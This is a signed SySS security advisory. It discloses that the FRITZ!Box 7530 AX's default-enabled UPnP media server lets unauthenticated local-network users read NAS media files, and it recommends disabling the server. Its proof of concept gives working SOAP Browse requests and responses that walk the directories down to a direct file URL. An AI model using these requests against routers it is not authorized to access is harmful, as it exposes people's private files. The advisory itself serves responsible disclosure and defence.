-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID:               SYSS-2021-050
Product:                   FRITZ!Box 7530 AX
Manufacturer:              AVM Computersysteme Vertriebs GmbH
Affected Version(s):       FRITZ!OS 7.27 and earlier
Tested Version(s):         FRITZ!OS 7.27
Vulnerability Type:        Missing Authorization (CWE-862)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2021-08-02
Solution Date:             2021-08-02
Public Disclosure:         2022-02-15
CVE Reference:             Not yet assigned
Authors of Advisory:       Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The FRITZ!Box 7530 AX [1] is a multifunctional home router including
many features like Wi-Fi 6, telephony services and others.

The router provides a network-attached storage (NAS), where authenticated 
users can store e.g. photos, videos and music. Authentication is required 
to access this data via the web application or via SMB. However, streaming 
any media data (pictures, videos and music) via Universal Plug and Play (UPnP) 
is possible without any authentication. 

Due to this issue, unauthenticated attackers with access to the internal 
network have read permissions on any media file stored on the NAS.

Since the UPnP standard [2] does not provide for authentication, 
this is the expected behavior. 
However, the UPnP media server is enabled in the default setting of the FRITZ!Box.
Users could be misled by this and grant access to otherwise protected data. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

To exploit this issue, an attacker with access to the internal network 
of the FRITZ!Box 7530 AX, e.g. via Wi-Fi or LAN, can use UPnP with its
protocols and procedures to read media content stored on the NAS service
of the FRITZ!Box without authentication. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. By sending the following HTTP POST request to the FRTIZ!Box, 
information about the NAS directories and their container IDs will be 
obtained:

Request:
  POST /MediaServer/ContentDirectory/Control HTTP/1.1
  Host: 192.168.178.1:49000
  SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
  Content-Type: text/xml; charset="utf-8"
  Content-Length: 321
  
  <?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <s:Body>
        <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
          <ObjectID>
            0
          </ObjectID>
          <BrowseFlag>
            BrowseDirectChildren
          </BrowseFlag>
        </u:Browse>
      </s:Body>
    </s:Envelope>

Response (shortened):
  <container id="4:cont1:90:0:0:" parentID="0" restricted="0" childCount="2">
    <dc:title>
      Bilder
    </dc:title>
    <upnp:class>
      object.container
    </upnp:class> 
  </container>


2. By sending the following HTTP POST request, including the container ID 
of a specific directory, the FRTIZ!Box responds with information about 
subdirectories and their container IDs:

Request:
  POST /MediaServer/ContentDirectory/Control HTTP/1.1
  Host: 192.168.178.1:49000
  SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
  Content-Type: text/xml; charset="utf-8"
  Content-Length: 335
  
  <?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <s:Body>
        <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
          <ObjectID>
            4:cont1:90:0:0:
          </ObjectID>
          <BrowseFlag>
            BrowseDirectChildren
          </BrowseFlag>
        </u:Browse>
      </s:Body>
    </s:Envelope>

Response (shortened):
  <container id="4:cont2:100:0:0:" parentID="4:cont1:90:0:0:" restricted="0" childCount="1" >
    <dc:title>
      Alle Bilder
    </dc:title> 
    <upnp:class>
      object.container
    </upnp:class>
  </container>


3. This container ID can then be used to get information about media 
files in this directory:

Request:
  POST /MediaServer/ContentDirectory/Control HTTP/1.1
  Host: 192.168.178.1:49000
  SOAPAction: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
  Content-Type: text/xml; charset="utf-8"
  Content-Length: 336
  
  <?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <s:Body>
        <u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
          <ObjectID>
            4:cont2:100:0:0:
          </ObjectID>
          <BrowseFlag>
            BrowseDirectChildren
          </BrowseFlag>
        </u:Browse>
      </s:Body>
    </s:Envelope>

Response (shortened):

  <res protocolInfo="http-get:*:image/jpeg:DLNA.ORG_PN=JPEG_SM;DLNA.ORG_OP=01;DLNA.ORG_CI=0;DLNA.ORG_FLAGS=00f00000000000000000000000000000">
    http://192.168.178.1:49200/IMAGE/DLNA-15-0/Bilder/TOP-SECRET.jpg
  </res>


4. Now, the TOP-SECRET.jpg picture is accessable at the URL 
"http://192.168.178.1:49200/IMAGE/DLNA-15-0/Bilder/TOP-SECRET.jpg"
without authentication.


Alternatively, the open-source tool gupnp-av-cp [4] could be used,
which provides a graphical user interface and simplifies the exploitation 
of this issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH recommends disabling the media server function.
For this, go to "Home Network > Media Server > Settings" at the 
web interface of the FRITZ!Box. Then uncheck the checkbox 
"Media Server enabled" and apply the configuration.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-13: Vulnerability discovered
2021-08-02: Vulnerability reported to manufacturer
2021-08-04: The manufacturer indicates that this is the desired behavior 
            and therefore no further measures are planned.
2022-02-15: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website
    https://en.avm.de/products/fritzbox/fritzbox-7530-ax/
[2] UPnP Standards
    https://openconnectivity.org/developer/specifications/upnp-resources/upnp/#standards
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[4] GUPnP Tool Website:
    https://wiki.gnome.org/Projects/GUPnP

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmICUNIACgkQrgyb+PE0
i1M8LRAAmKoowDak1HXMZ8kpVKj0e/DgVOwf1OAZmAi4dZ1vmbNiQkkZCcdds2ls
V8/uW4J2eJxVf9hUpoY3GV8T11mMxJbgOFqLKF3TpL48ZOobGkP1+X2n307p0cXH
HLbo+bj0vGvIe+PAaZLZn9PbhaP/2qZTzALNhVQ5SaCiEuc/V8lWcNb7A1Ig8IqV
Yuz7l1iC6XS7M5w/nFewv3BKNAHQ1rScWZNgHhZ8PSUiTsjNJ7qCu99o4Q//Vf5t
LHBtX+sO7zxqnU9ukyspKs7YkLOUhdw0m8rO6zbqWRH398Etr/u5pRin2W7wABX6
/8VB/SNSgI/MzU+ItPC+6eLEZGOZqDB2NJ5TJXZR/KyXEux7IVu5KQ8aULLNRYkl
uVgFhMEFDXe6hTEUFBvMiRkT/4BlyyleY71HprcfHq5joRWbboJcrsLjf8IyYL82
CLFpDSb27jzfWTtQ48ij7aEBBGAJrX9ER7rBW87Xxs0ft0mUY4d6c4JDpeUMxb14
ZSimjTDplRwMwzKzbdSbik+v977adoFQ/1OOk/MfoACsurYj3D76ohnBea+ORDGr
vpZ7FDNZ1lfrpc+KgXqCKnVwK/o1g7nOypYJmhoD190pb7o52sBO8M+OfMhOR6gR
XA4Fx7ePsAC50W/UWE6ehsaYMwcFig7uqACceSc9hN2y152cZTU=
=pfSg
-----END PGP SIGNATURE-----